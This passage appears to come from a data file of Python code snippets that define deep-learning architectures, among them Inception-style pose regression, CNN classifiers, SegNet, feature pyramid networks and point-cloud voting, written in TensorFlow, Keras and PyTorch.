'icp2_out')\n \n \"\"\" 3rd inception layer group \"\"\"\n print(\"icp3\")\n with tf.name_scope('icp3'):\n icp3_in = NW.max_pool(icp2_out, 3, 3, 2, 2, name='icp3_in')\n # branch 0\n icp3_out0 = NW.conv(icp3_in, 1, 1, 192, 1, 1, name='icp3_out0')\n # branch 1\n icp3_reduction1 = NW.conv(icp3_in, 1, 1, 96, 1, 1, name='icp3_reduction1')\n icp3_out1 = NW.conv(icp3_reduction1, 3, 3, 208, 1, 1, name='icp3_out1')\n # branch 2\n icp3_reduction2 = NW.conv(icp3_in, 1, 1, 16, 1, 1, name='icp3_reduction2')\n icp3_out2 = NW.conv(icp3_reduction2, 5, 5, 48, 1, 1, name='icp3_out2')\n # branch 3\n icp3_pool = NW.max_pool(icp3_in, 3, 3, 1, 1, name='icp3_pool')\n icp3_out3 = NW.conv(icp3_pool, 1, 1, 64, 1, 1, name='icp3_out3')\n # concat\n icp3_out = NW.concat([icp3_out0,\n icp3_out1,\n icp3_out2,\n icp3_out3], 3, 'icp3_out')\n \n \"\"\" 1st classify branch \"\"\"\n with tf.name_scope('cls1'):\n cls1_pool = NW.avg_pool(icp3_out, 5, 5, 3, 3, padding='VALID', name='cls1_pool')\n cls1_reduction_pose = NW.conv(cls1_pool, 1, 1, 128, 1, 1, name='cls1_reduction_pose')\n cls1_fc1_pose = NW.fc(cls1_reduction_pose, 1024, name='cls1_fc1_pose')\n cls1_fc_pose_xy = NW.fc(cls1_fc1_pose, 2, relu=False, name='cls1_fc_pose_xy')\n cls1_fc_pose_ab = NW.fc(cls1_fc1_pose, 2, relu=False, name='cls1_fc_pose_ab')\n self.layers[\"cls1_fc_pose_xy\"] = cls1_fc_pose_xy\n self.layers[\"cls1_fc_pose_ab\"] = cls1_fc_pose_ab\n \n \"\"\" 4st inception layer group \"\"\"\n print(\"icp4\")\n with tf.name_scope('icp4'):\n # branch 0\n icp4_out0 = NW.conv(icp3_out, 1, 1, 160, 1, 1, name='icp4_out0')\n # branch 1\n icp4_reduction1 = NW.conv(icp3_out, 1, 1, 112, 1, 1, name='icp4_reduction1')\n icp4_out1 = NW.conv(icp4_reduction1, 3, 3, 224, 1, 1, name='icp4_out1')\n # branch 2\n icp4_reduction2 = NW.conv(icp3_out, 1, 1, 24, 1, 1, name='icp4_reduction2')\n icp4_out2 = NW.conv(icp4_reduction2, 5, 5, 64, 1, 1, name='icp4_out2')\n # branch 3\n icp4_pool = NW.max_pool(icp3_out, 3, 3, 1, 1, name='icp4_pool')\n icp4_out3 = NW.conv(icp4_pool, 1, 1, 64, 1, 1, name='icp4_out3')\n # concat\n icp4_out = NW.concat([icp4_out0,\n icp4_out1,\n icp4_out2,\n icp4_out3],3, name='icp4_out')\n\n \"\"\" 5st inception layer group \"\"\"\n print(\"icp5\")\n with tf.name_scope('icp5'):\n # branch 0\n icp5_out0 = NW.conv(icp4_out, 1, 1, 128, 1, 1, name='icp5_out0')\n # branch 1\n icp5_reduction1 = NW.conv(icp4_out, 1, 1, 128, 1, 1, name='icp5_reduction1')\n icp5_out1 = NW.conv(icp5_reduction1, 3, 3, 256, 1, 1, name='icp5_out1')\n # branch 2\n icp5_reduction2 = NW.conv(icp4_out,1, 1, 24, 1, 1, name='icp5_reduction2')\n icp5_out2 = NW.conv(icp5_reduction2, 5, 5, 64, 1, 1, name='icp5_out2')\n # branch 3\n icp5_pool = NW.max_pool(icp4_out,3, 3, 1, 1, name='icp5_pool')\n icp5_out3 = NW.conv(icp5_pool, 1, 1, 64, 1, 1, name='icp5_out3')\n # concat\n icp5_out = NW.concat([icp5_out0, \n icp5_out1, \n icp5_out2, \n icp5_out3], 3, name='icp5_out')\n \n \"\"\" 6st inception layer group \"\"\"\n print(\"icp6\")\n with tf.name_scope('icp6'):\n # branch 0\n icp6_out0 = NW.conv(icp5_out, 1, 1, 112, 1, 1, name='icp6_out0')\n # branch 1\n icp6_reduction1 = NW.conv(icp5_out, 1, 1, 144, 1, 1, name='icp6_reduction1')\n icp6_out1 = NW.conv(icp6_reduction1, 3, 3, 288, 1, 1, name='icp6_out1')\n # branch 2\n icp6_reduction2 = NW.conv(icp5_out, 1, 1, 32, 1, 1, name='icp6_reduction2')\n icp6_out2 = NW.conv(icp6_reduction2, 5, 5, 64, 1, 1, name='icp6_out2')\n # branch 3\n icp6_pool = NW.max_pool(icp5_out,3, 3, 1, 1, name='icp6_pool')\n icp6_out3 = NW.conv(icp6_pool, 1, 1, 64, 1, 1, name='icp6_out3')\n # concat\n icp6_out = NW.concat([icp6_out0,\n icp6_out1,\n icp6_out2,\n icp6_out3], 3, name='icp6_out')\n\n \"\"\" 2nd classify branch \"\"\"\n with tf.name_scope('cls2'):\n cls2_pool = NW.avg_pool(icp6_out, 5, 5, 3, 3, padding='VALID', name='cls2_pool')\n cls2_reduction_pose = NW.conv(cls2_pool, 1, 1, 128, 1, 1, name='cls2_reduction_pose')\n cls2_fc1 = NW.fc(cls2_reduction_pose, 1024, name='cls2_fc1')\n cls2_fc_pose_xy = NW.fc(cls2_fc1, 2, relu=False, name='cls2_fc_pose_xy')\n cls2_fc_pose_ab = NW.fc(cls2_fc1, 2, relu=False, name='cls2_fc_pose_ab')\n self.layers[\"cls2_fc_pose_xy\"] = cls2_fc_pose_xy\n self.layers[\"cls2_fc_pose_ab\"] = cls2_fc_pose_ab\n\n \"\"\" 7st inception layer group \"\"\"\n print(\"icp7\")\n with tf.name_scope('icp7'):\n # branch 0\n icp7_out0 = NW.conv(icp6_out, 1, 1, 256, 1, 1, name='icp7_out0')\n # branch 1\n icp7_reduction1 = NW.conv(icp6_out, 1, 1, 160, 1, 1, name='icp7_reduction1')\n icp7_out1 = NW.conv(icp7_reduction1, 3, 3, 320, 1, 1, name='icp7_out1')\n # branch 2\n icp7_reduction2 = NW.conv(icp6_out, 1, 1, 32, 1, 1, name='icp7_reduction2')\n icp7_out2 = NW.conv(icp7_reduction2, 5, 5, 128, 1, 1, name='icp7_out2')\n # branch 3\n icp7_pool = NW.max_pool(icp6_out, 3, 3, 1, 1, name='icp7_pool')\n icp7_out3 = NW.conv(icp7_pool, 1, 1, 128, 1, 1, name='icp7_out3')\n # concat\n icp7_out = NW.concat([icp7_out0,\n icp7_out1,\n icp7_out2,\n icp7_out3], 3, name='icp7_out')\n\n \"\"\" 8st inception layer group \"\"\"\n print(\"icp8\")\n with tf.name_scope('icp8'):\n icp8_in = NW.max_pool(icp7_out, 3, 3, 2, 2, name='icp8_in')\n # branch 0\n icp8_out0 = NW.conv(icp8_in, 1, 1, 256, 1, 1, name='icp8_out0')\n # branch 1\n icp8_reduction1 = NW.conv(icp8_in, 1, 1, 160, 1, 1, name='icp8_reduction1')\n icp8_out1 = NW.conv(icp8_reduction1, 3, 3, 320, 1, 1, name='icp8_out1')\n # branch 2\n icp8_reduction2 = NW.conv(icp8_in, 1, 1, 32, 1, 1, name='icp8_reduction2')\n icp8_out2 = NW.conv(icp8_reduction2, 5, 5, 128, 1, 1, name='icp8_out2')\n # branch 3\n icp8_pool = NW.max_pool(icp8_in, 3, 3, 1, 1, name='icp8_pool')\n icp8_out3 = NW.conv(icp8_pool, 1, 1, 128, 1, 1, name='icp8_out3')\n # concat\n icp8_out = NW.concat([icp8_out0,\n icp8_out1,\n icp8_out2,\n icp8_out3], 3, name='icp8_out')\n \n \"\"\" 9st inception layer group \"\"\"\n print(\"icp9\")\n with tf.name_scope('icp9'):\n # branch 0\n icp9_out0 = NW.conv(icp8_out, 1, 1, 384, 1, 1, name='icp9_out0')\n # branch 1\n icp9_reduction1 = NW.conv(icp8_out, 1, 1, 192, 1, 1, name='icp9_reduction1')\n icp9_out1 = NW.conv(icp9_reduction1, 3, 3, 384, 1, 1, name='icp9_out1')\n # branch 2\n icp9_reduction2 = NW.conv(icp8_out, 1, 1, 48, 1, 1, name='icp9_reduction2')\n icp9_out2 = NW.conv(icp9_reduction2, 5, 5, 128, 1, 1, name='icp9_out2')\n # branch 3\n icp9_pool = NW.max_pool(icp8_out, 3, 3, 1, 1, name='icp9_pool')\n icp9_out3 = NW.conv(icp9_pool, 1, 1, 128, 1, 1, name='icp9_out3')\n # concat\n icp9_out = NW.concat([icp9_out0,\n icp9_out1,\n icp9_out2,\n icp9_out3], 3, name='icp9_out')\n\n \"\"\" 3rd classify branch \"\"\"\n with tf.name_scope('cls3'):\n cls3_pool = NW.avg_pool(icp9_out, 7, 7, 1, 1, padding='VALID', name='cls3_pool')\n cls3_fc1_pose = NW.fc(cls3_pool, 2048, name='cls3_fc1_pose')\n cls3_fc_pose_xy = NW.fc(cls3_fc1_pose, 2, relu=False, name='cls3_fc_pose_xy')\n cls3_fc_pose_ab = NW.fc(cls3_fc1_pose, 2, relu=False, name='cls3_fc_pose_ab')\n self.layers[\"cls3_fc_pose_xy\"] = cls3_fc_pose_xy\n self.layers[\"cls3_fc_pose_ab\"] = cls3_fc_pose_ab", "def __init__(self, n_input_channels=3, n_conv_output_channels=16, k=3, s=1, pad=1, p = 0.5):\n super(ModelCNN, self).__init__()\n # 1. Convolutional layers\n # Single image is in shape: 3x96x96 (CxHxW, H==W), RGB images\n self.conv1 = nn.Conv2d(in_channels = n_input_channels, out_channels = n_conv_output_channels, kernel_size = k, stride = s, padding = pad)\n self.bn1 = nn.BatchNorm2d(n_conv_output_channels)\n self.conv2 = nn.Conv2d(in_channels = n_conv_output_channels, out_channels = 2*n_conv_output_channels, kernel_size = k, stride = s, padding = pad)\n self.bn2 = nn.BatchNorm2d(2*n_conv_output_channels)\n self.conv3 = nn.Conv2d(in_channels = 2*n_conv_output_channels, out_channels = 4*n_conv_output_channels, kernel_size = k, stride = s, padding = pad)\n self.bn3 = nn.BatchNorm2d(4*n_conv_output_channels)\n self.conv4 = nn.Conv2d(in_channels = 4*n_conv_output_channels, out_channels = 8*n_conv_output_channels, kernel_size = k, stride = s, padding = pad)\n self.bn4 = nn.BatchNorm2d(8*n_conv_output_channels)\n self.pool = nn.MaxPool2d(kernel_size = k - 1, stride = 2*s, padding = pad - pad)\n \n self.dropout = nn.Dropout(p = p)\n \n # 2. FC layers to final output\n self.fc1 = nn.Linear(in_features = 288*n_conv_output_channels, out_features = 32*n_conv_output_channels)\n self.fc_bn1 = nn.BatchNorm1d(32*n_conv_output_channels)\n self.fc2 = nn.Linear(in_features = 32*n_conv_output_channels, out_features = 16*n_conv_output_channels)\n self.fc_bn2 = nn.BatchNorm1d(16*n_conv_output_channels)\n self.fc3 = nn.Linear(in_features = 16*n_conv_output_channels, out_features = 8*n_conv_output_channels)\n self.fc_bn3 = nn.BatchNorm1d(8*n_conv_output_channels)\n self.fc4 = nn.Linear(in_features = 8*n_conv_output_channels, out_features = 1)", "def setup_net(self):\n\t\tself.src_net = get_model(self.base_model, num_cls=self.num_cls, \\\n\t\t\t\t\t\t\t\t l2_normalize=self.l2_normalize, temperature=self.temperature)\n\t\tself.tgt_net = self.custom_copy(self.src_net, self.weight_sharing)\n\n\t\tinput_dim = self.num_cls\n\t\tself.discriminator = nn.Sequential(\n\t\t\t\tnn.Linear(input_dim, 500),\n\t\t\t\tnn.ReLU(),\n\t\t\t\tnn.Linear(500, 500),\n\t\t\t\tnn.ReLU(),\n\t\t\t\tnn.Linear(500, 2),\n\t\t\t\t)\n\n\t\tself.image_size = self.src_net.image_size\n\t\tself.num_channels = self.src_net.num_channels", "def __init__(self, num_classes):\n super().__init__()\n # maintains size of 128x128\n self.conv1 = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, stride=1, padding=1)\n # maintains size of 64x64\n self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=1)\n # Half size\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n # Original image of size 128x128 is halved twice to 32 * 32. With 64 channels flattened is 32 * 32 * 64\n self.fc1 = nn.Linear(32 * 32 * 64, 1000)\n self.fc2 = nn.Linear(1000, num_classes)\n self.dropout = nn.Dropout()", "def create_base_network(NumberOfFeatures, NumberOfClasses,init_mode='glorot_normal'):\n network = Sequential()\n network.add(Dense(44, activation='sigmoid', kernel_initializer=init_mode,input_dim=NumberOfFeatures))\n# network.add(Dense(22, activation='sigmoid',kernel_initializer=init_mode))\n network.add(Dense(NumberOfClasses, activation='softmax',kernel_initializer=init_mode))\n return network", "def __init__(self):\n torch.nn.Module.__init__(self)\n ######################### Convolution and pooling layers of VGG-16.\n self.features = torchvision.models.vgg16(pretrained=True).features # fine tune?\n self.features = torch.nn.Sequential(*list(self.features.children())\n [:-22]) # Remove pool2 and rest, lack of computational resource\n # No grad for convVGG\n # for param in self.features.parameters():\n # param.requires_grad = False\n\n #################### Channel Grouping Net\n # self.fc1_ = torch.nn.Linear(128, 128*16)#lack of resource\n # self.fc2_ = torch.nn.Linear(128, 128*16)\n # self.fc3_ = torch.nn.Linear(128, 128*16)\n #\n # torch.nn.init.kaiming_normal_(self.fc1_.weight.data, nonlinearity='relu')\n # if self.fc1_.bias is not None:\n # torch.nn.init.constant_(self.fc1_.bias.data, val=0) # fc层的bias进行constant初始化\n # torch.nn.init.kaiming_normal_(self.fc2_.weight.data, nonlinearity='relu')\n # if self.fc2_.bias is not None:\n # torch.nn.init.constant_(self.fc2_.bias.data, val=0) # fc层的bias进行constant初始化\n # torch.nn.init.kaiming_normal_(self.fc3_.weight.data, nonlinearity='relu')\n # if self.fc3_.bias is not None:\n # torch.nn.init.constant_(self.fc3_.bias.data, val=0) # fc层的bias进行constant初始化\n\n self.fc1 = torch.nn.Linear(128*28*28, 128)\n self.fc2 = torch.nn.Linear(128*28*28, 128)\n self.fc3 = torch.nn.Linear(128*28*28, 128)\n\n\n torch.nn.init.kaiming_normal_(self.fc1.weight.data, nonlinearity='relu')\n if self.fc1.bias is not None:\n torch.nn.init.constant_(self.fc1.bias.data, val=0) # fc层的bias进行constant初始化\n torch.nn.init.kaiming_normal_(self.fc2.weight.data, nonlinearity='relu')\n if self.fc2.bias is not None:\n torch.nn.init.constant_(self.fc2.bias.data, val=0) # fc层的bias进行constant初始化\n torch.nn.init.kaiming_normal_(self.fc3.weight.data, nonlinearity='relu')\n if self.fc3.bias is not None:\n torch.nn.init.constant_(self.fc3.bias.data, val=0) # fc层的bias进行constant初始化\n\n self.layerNorm=nn.LayerNorm([224,224])\n\n # global grad for hook\n self.image_reconstruction = None\n self.register_hooks()\n self.GradWeight=1e-1\n\n # ################### STN input N*3*448*448\n # self.localization = [\n # nn.Sequential(\n # nn.MaxPool2d(4,stride=4),#112\n # nn.ReLU(True),\n #\n # nn.Conv2d(3, 32, kernel_size=5,stride=1,padding=2), # 112\n # nn.MaxPool2d(2, stride=2), # 56\n # nn.ReLU(True),\n #\n # nn.Conv2d(32, 48, kernel_size=3,stride=1,padding=1),\n # nn.MaxPool2d(2, stride=2), # 56/2=28\n # nn.ReLU(True),\n #\n # nn.Conv2d(48, 64, kernel_size=3, stride=1, padding=1),\n # nn.MaxPool2d(2, stride=2), # 28/2=14\n # nn.ReLU(True) #output 64*14*14\n # ).cuda(),\n # nn.Sequential(\n # nn.MaxPool2d(4, stride=4), # 112\n # nn.ReLU(True),\n #\n # nn.Conv2d(3, 32, kernel_size=5, stride=1, padding=2), # 112\n # nn.MaxPool2d(2, stride=2), # 56\n # nn.ReLU(True),\n #\n # nn.Conv2d(32, 48, kernel_size=3, stride=1, padding=1),\n # nn.MaxPool2d(2, stride=2), # 56/2=28\n # nn.ReLU(True),\n #\n # nn.Conv2d(48, 64, kernel_size=3, stride=1, padding=1),\n # nn.MaxPool2d(2, stride=2), # 28/2=14\n # nn.ReLU(True) # output 64*14*14\n # ).cuda(),\n # nn.Sequential(\n # nn.MaxPool2d(4, stride=4), # 112\n # nn.ReLU(True),\n #\n # nn.Conv2d(3, 32, kernel_size=5, stride=1, padding=2), # 112\n # nn.MaxPool2d(2, stride=2), # 56\n # nn.ReLU(True),\n #\n # nn.Conv2d(32, 48, kernel_size=3, stride=1, padding=1),\n # nn.MaxPool2d(2, stride=2), # 56/2=28\n # nn.ReLU(True),\n #\n # nn.Conv2d(48, 64, kernel_size=3, stride=1, padding=1),\n # nn.MaxPool2d(2, stride=2), # 28/2=14\n # nn.ReLU(True) # output 64*14*14\n # ).cuda()\n # ]\n # # Regressor for the 3 * 2 affine matrix\n # self.fc_loc = [\n # nn.Sequential(\n # nn.Linear(64 * 14 * 14, 32),\n # nn.ReLU(True),\n # nn.Linear(32, 3 * 2)\n # ).cuda(),\n # nn.Sequential(\n # nn.Linear(64 * 14 * 14, 32),\n # nn.ReLU(True),\n # nn.Linear(32, 3 * 2)\n # ).cuda(),\n # nn.Sequential(\n # nn.Linear(64 * 14 * 14, 32),\n # nn.ReLU(True),\n # nn.Linear(32, 3 * 2)\n # ).cuda()\n # ]\n # # Initialize the weights/bias with identity transformation\n # for fc_locx in self.fc_loc:\n # fc_locx[2].weight.data.zero_()\n # fc_locx[2].bias.data.copy_(torch.tensor([1, 0, 0, 0, 1, 0], dtype=torch.float))\n\n ########################Bilinear CNN output 256 channels\n self.bcnnConv_1=torch.nn.Sequential(*list(torchvision.models.vgg16(pretrained=True).features.children())\n [:-1]) # Remove pool3 and rest.\n self.bcnnConv_2 = torch.nn.Sequential(*list(torchvision.models.vgg16(pretrained=True).features.children())\n [:-1]) # Remove pool3 and rest.\n self.bcnnConv_3 = torch.nn.Sequential(*list(torchvision.models.vgg16(pretrained=True).features.children())\n [:-1]) # Remove pool3 and rest.\n #BCNN Linear classifier.\n self.bfc1 = torch.nn.Linear(512*512, 200)\n self.bfc2 = torch.nn.Linear(512*512, 200)\n self.bfc3 = torch.nn.Linear(512*512, 200)\n torch.nn.init.kaiming_normal_(self.bfc1.weight.data) # 何凯明初始化\n if self.bfc1.bias is not None:\n torch.nn.init.constant_(self.bfc1.bias.data, val=0) # fc层的bias进行constant初始化\n torch.nn.init.kaiming_normal_(self.bfc2.weight.data) # 何凯明初始化\n if self.bfc2.bias is not None:\n torch.nn.init.constant_(self.bfc2.bias.data, val=0) # fc层的bias进行constant初始化\n torch.nn.init.kaiming_normal_(self.bfc3.weight.data) # 何凯明初始化\n if self.bfc3.bias is not None:\n torch.nn.init.constant_(self.bfc3.bias.data, val=0) # fc层的bias进行constant初始化\n\n # self.CBP1 = CompactBilinearPooling(512, 512, 50000)\n # self.CBP2 = CompactBilinearPooling(512, 512, 50000)\n # self.CBP3 = CompactBilinearPooling(512, 512, 50000)", "def __init__(self, in_channels=3, in_channels1=3, n_classes=21):\n super(SegNet, self).__init__()\n\n self.layer_1 = SegnetLayer_Encoder(in_channels, 64, 2)\n self.layer_2 = SegnetLayer_Encoder(64, 128, 2)\n self.layer_3 = SegnetLayer_Encoder(128, 256, 3)\n self.layer_4 = SegnetLayer_Encoder(256, 512, 3)\n self.layer_5 = SegnetLayer_Encoder(512, 512, 3)\n\n self.layer_6 = SegnetLayer_Decoder(512, 512, 3)\n self.layer_7 = SegnetLayer_Decoder(512, 256, 3)\n self.layer_8 = SegnetLayer_Decoder(256, 128, 3)\n self.layer_9 = SegnetLayer_Decoder(128, 64, 2)\n self.layer_10 = SegnetLayer_Decoder(64, n_classes, 2)\n\n self.layer_11 = SegnetLayer_Encoder(in_channels1, 64, 2)\n self.layer_12 = SegnetLayer_Encoder(64, 128, 2)\n self.layer_13 = SegnetLayer_Encoder(128, 256, 3)\n self.layer_14 = SegnetLayer_Encoder(256, 512, 3)\n self.layer_15 = SegnetLayer_Encoder(512, 512, 3)\n\n self.layer_16 = SegnetLayer_Decoder(512, 512, 3)\n self.layer_17 = SegnetLayer_Decoder(512, 256, 3)\n self.layer_18 = SegnetLayer_Decoder(256, 128, 3)\n self.layer_19 = SegnetLayer_Decoder(128, 64, 2)\n self.layer_110 = SegnetLayer_Decoder(64, n_classes, 2)\n\n self.layer_1110 = UNet_Decoder_Particular(n_classes * 2, n_classes)", "def __init__(self, slug, num_filters=256, pretrained=True, bifpn=False):\n self.slug = slug\n\n super().__init__()\n if not pretrained:\n print(\"Caution, not loading pretrained weights.\")\n\n if slug == \"eff5\":\n basemodel = timm.create_model('tf_efficientnet_b5_ns', pretrained=pretrained)\n num_bottleneck_filters = 512\n else:\n assert False, \"Bad slug: %s\" % slug\n \n self.bifpn = bifpn\n if bifpn:\n self.BiFPN = BiFPN(num_filters)\n # Access resnet directly in forward pass; do not store refs here due to\n # https://github.com/pytorch/pytorch/issues/8392\n\n self.lateral4 = Conv1x1(num_bottleneck_filters, num_filters)\n self.lateral3 = Conv1x1(176, num_filters)\n self.lateral2 = Conv1x1(64, num_filters)\n self.lateral1 = Conv1x1(40, num_filters)\n\n self.smooth4 = Conv3x3(num_filters, num_filters)\n self.smooth3 = Conv3x3(num_filters, num_filters)\n self.smooth2 = Conv3x3(num_filters, num_filters)\n self.smooth1 = Conv3x3(num_filters, num_filters)\n \n self.enc1 = nn.Sequential(basemodel.blocks[0:2])\n self.enc2 = nn.Sequential(basemodel.blocks[2:3])\n self.enc3 = nn.Sequential(basemodel.blocks[3:5])\n self.enc4 = nn.Sequential(basemodel.blocks[5:7])\n \n self.enc0 = nn.Sequential(basemodel.conv_stem, basemodel.bn1, basemodel.act1)", "def __call__(self, **kwargs):\n segname = 'block_{}_expand_relu'\n blocks = [13, 6, 3, 1]\n skips = [self._backbone.get_layer(segname.format(i)) for i in blocks]\n backbone_out = self._backbone.get_layer('block_16_project')\n\n p5 = self._fpn_block(backbone_out.output, skips[0].output)\n p4 = self._fpn_block(p5, skips[1].output)\n p3 = self._fpn_block(p4, skips[2].output)\n p2 = self._fpn_block(p3, skips[3].output)\n\n s5 = self._conv_block(p5, 128)\n s4 = self._conv_block(p4, 128)\n s3 = self._conv_block(p3, 128)\n s2 = self._conv_block(p2, 128)\n\n s5 = tf.keras.layers.UpSampling2D(\n size=(8, 8),\n interpolation='nearest'\n )(s5)\n\n s4 = tf.keras.layers.UpSampling2D(\n size=(4, 4),\n interpolation='nearest'\n )(s4)\n\n s3 = tf.keras.layers.UpSampling2D(\n size=(2, 2),\n interpolation='nearest'\n )(s3)\n\n concat = [s5, s4, s3, s2]\n x = tf.keras.layers.Concatenate()(concat)\n x = tf.keras.layers.Conv2D(\n 64,\n kernel_size=3,\n padding='same',\n kernel_initializer='he_uniform'\n )(x)\n\n x = tf.keras.layers.BatchNormalization()(x)\n x = tf.keras.layers.Activation('relu')(x)\n x = tf.keras.layers.UpSampling2D((2, 2))(x)\n\n x = tf.keras.layers.Conv2D(\n 1,\n kernel_size=3,\n padding='same',\n kernel_initializer='he_uniform'\n )(x)\n\n out = tf.keras.layers.Activation('sigmoid')(x)\n model = tf.keras.models.Model(\n inputs=self._backbone.input,\n outputs=out\n )\n\n return model", "def conv_net(x, keep_prob, nconv1, nconv2, nfullyconn, nfullyconn2):\n # TODO: Apply 1, 2, or 3 Convolution and Max Pool layers\n # Play around with different number of outputs, kernel size and stride\n # Function Definition from Above:\n # conv2d_maxpool(x_tensor, conv_num_outputs, conv_ksize, conv_strides, pool_ksize, pool_strides)\n #layer_norm = tflearn.layers.normalization.batch_normalization (x, name='BatchNormalization')\n layer_conv = conv2d_maxpool(x, nconv1, (2,2), (2,2), (2,2), (2,2))\n #layer_conv = tf.nn.dropout(layer_conv, keep_prob)\n layer_conv = tf.layers.batch_normalization (layer_conv, name='BatchNormalization')\n #layer_conv = tf.nn.dropout(layer_conv, keep_prob)\n #print(layer_conv)\n layer_conv = conv2d_maxpool(x, nconv2, (5,5), (2,2), (2,2), (2,2))\n layer_conv = tf.layers.batch_normalization (layer_conv, name='BatchNormalization2')\n # TODO: Apply a Flatten Layer\n # Function Definition from Above:\n # flatten(x_tensor)\n layer_flat = flatten(layer_conv)\n #layer_flat = tflearn.layers.normalization.batch_normalization (layer_flat, name='BatchNormalization')\n \n \n\n # TODO: Apply 1, 2, or 3 Fully Connected Layers\n # Play around with different number of outputs\n # Function Definition from Above:\n # fully_conn(x_tensor, num_outputs)\n #layer_fully_conn = fully_conn(x, nfullyconn)\n layer_fully_conn = fully_conn(layer_flat, nfullyconn)\n #print(\"Fully Connected Outputs: {}\".format(layer_fully_conn.shape[1]))\n #layer_fully_conn = fully_conn(layer_fully_conn, nconv)\n layer_fully_conn = tf.layers.batch_normalization (layer_fully_conn, name='BatchNormalization3')\n layer_flat = flatten(layer_fully_conn)\n layer_fully_conn = fully_conn(layer_flat, nfullyconn2)\n layer_fully_conn = tf.layers.batch_normalization (layer_fully_conn, name='BatchNormalization4')\n layer_flat = flatten(layer_fully_conn)\n layer_fully_conn = tf.nn.dropout(layer_fully_conn, keep_prob)\n #layer_fully_conn = tf.nn.dropout(layer_fully_conn, keep_prob)\n \n # TODO: Apply an Output Layer\n # Set this to the number of classes\n # Function Definition from Above:\n # output(x_tensor, num_outputs)\n layer_final = output(layer_fully_conn, 46)\n \n \n # TODO: return output\n return layer_final", "def network_modified(input):\n\n up6 = upsample_and_concat( conv5, conv4, 256, 512 , 'up_conv1' )\n conv6=slim.conv2d(up6, 256,[3,3], rate=1, activation_fn=lrelu,scope='g_conv6_1')\n conv6=slim.conv2d(conv6,256,[3,3], rate=1, activation_fn=lrelu,scope='g_conv6_2')\n\n up7 = upsample_and_concat( conv6, conv3, 128, 256 , 'up_conv2' )\n conv7=slim.conv2d(up7, 128,[3,3], rate=1, activation_fn=lrelu,scope='g_conv7_1')\n conv7=slim.conv2d(conv7,128,[3,3], rate=1, activation_fn=lrelu,scope='g_conv7_2')\n\n up8 = upsample_and_concat( conv7, conv2, 64, 128 , 'up_conv3')\n conv8=slim.conv2d(up8, 64,[3,3], rate=1, activation_fn=lrelu,scope='g_conv8_1')\n conv8=slim.conv2d(conv8,64,[3,3], rate=1, activation_fn=lrelu,scope='g_conv8_2')\n\n up9 = upsample_and_concat( conv8, conv1, 32, 64 , 'up_conv4')\n conv9=slim.conv2d(up9, 32,[3,3], rate=1, activation_fn=lrelu,scope='g_conv9_1')\n conv9=slim.conv2d(conv9,32,[3,3], rate=1, activation_fn=lrelu,scope='g_conv9_2')\n\n conv10=slim.conv2d(conv9,12,[1,1], rate=1, activation_fn=None, scope='g_conv10')\n out = tf.depth_to_space(conv10,2)\n return out", "def forward(self, inputs, end_points, mode=\"\"):\n batch_size = inputs['point_clouds'].shape[0]\n\n end_points = self.backbone_net1(inputs['point_clouds'], end_points)\n end_points = self.backbone_net2(inputs['point_clouds'], end_points, mode='net1')\n end_points = self.backbone_net3(inputs['point_clouds'], end_points, mode='net2')\n end_points = self.backbone_net4(inputs['point_clouds'], end_points, mode='net3')\n\n ### Extract feature here\n xyz = end_points['fp2_xyz']\n features1 = end_points['fp2_features']\n features2 = end_points['fp2_features'+'net1']\n features3 = end_points['fp2_features'+'net2']\n features4 = end_points['fp2_features'+'net3']\n end_points['seed_inds'] = end_points['fp2_inds']\n end_points['seed_xyz'] = xyz\n end_points['seed_features'] = features1\n \n ### Combine the feature here\n features_hd_discriptor = torch.cat((features1, features2, features3, features4), dim=1)\n features_hd_discriptor = F.relu(self.bn_agg1(self.conv_agg1(features_hd_discriptor)))\n features_hd_discriptor = F.relu(self.bn_agg2(self.conv_agg2(features_hd_discriptor)))\n\n end_points['hd_feature'] = features_hd_discriptor\n \n net_flag_z = F.relu(self.bn_flag_z1(self.conv_flag_z1(features_hd_discriptor)))\n net_flag_z = self.conv_flag_z2(net_flag_z)\n end_points[\"pred_flag_z\"] = net_flag_z\n\n net_flag_xy = F.relu(self.bn_flag_xy1(self.conv_flag_xy1(features_hd_discriptor)))\n net_flag_xy = self.conv_flag_xy2(net_flag_xy)\n end_points[\"pred_flag_xy\"] = net_flag_xy\n\n net_flag_line = F.relu(self.bn_flag_line1(self.conv_flag_line1(features_hd_discriptor)))\n net_flag_line = self.conv_flag_line2(net_flag_line)\n end_points[\"pred_flag_line\"] = net_flag_line\n\n proposal_xyz, proposal_features, center_offset, center_residual = self.vgen(xyz, features_hd_discriptor)\n proposal_features_norm = torch.norm(proposal_features, p=2, dim=1)\n proposal_features = proposal_features.div(proposal_features_norm.unsqueeze(1))\n end_points['vote_xyz'] = proposal_xyz\n end_points['vote_features'] = proposal_features\n \n voted_z, voted_z_feature, z_offset, z_residual = self.vgen_z(xyz, features_hd_discriptor)\n voted_z_feature_norm = torch.norm(voted_z_feature, p=2, dim=1)\n voted_z_feature = voted_z_feature.div(voted_z_feature_norm.unsqueeze(1))\n end_points['vote_z'] = voted_z\n end_points['vote_z_feature'] = voted_z_feature\n\n voted_xy, voted_xy_feature, xy_offset, xy_residual = self.vgen_xy(xyz, features_hd_discriptor)\n voted_xy_feature_norm = torch.norm(voted_xy_feature, p=2, dim=1)\n voted_xy_feature = voted_xy_feature.div(voted_xy_feature_norm.unsqueeze(1))\n end_points['vote_xy'] = voted_xy\n end_points['vote_xy_feature'] = voted_xy_feature\n\n voted_line, voted_line_feature, line_offset, line_residual = self.vgen_line(xyz, features_hd_discriptor)\n voted_line_feature_norm = torch.norm(voted_line_feature, p=2, dim=1)\n voted_line_feature = voted_line_feature.div(voted_line_feature_norm.unsqueeze(1))\n end_points['vote_line'] = voted_line\n end_points['vote_line_feature'] = voted_line_feature\n \n center_z, feature_z, end_points = self.pnet_z(voted_z, voted_z_feature, end_points, mode='_z')\n center_xy, feature_xy, end_points = self.pnet_xy(voted_xy, voted_xy_feature, end_points, mode='_xy')\n center_line, feature_line, end_points = self.pnet_line(voted_line, voted_line_feature, end_points, mode='_line')\n\n end_points = self.pnet_final(proposal_xyz, proposal_features, center_z, feature_z, center_xy, feature_xy, center_line, feature_line, end_points)\n return end_points", "def _make_conv_layers(self):\n conv = nn.Sequential(\n nn.Conv2d(in_channels=3, out_channels=64, kernel_size=7, stride=2, padding=1), # padding=3 so, output is 224.\n nn.LeakyReLU(0.1, 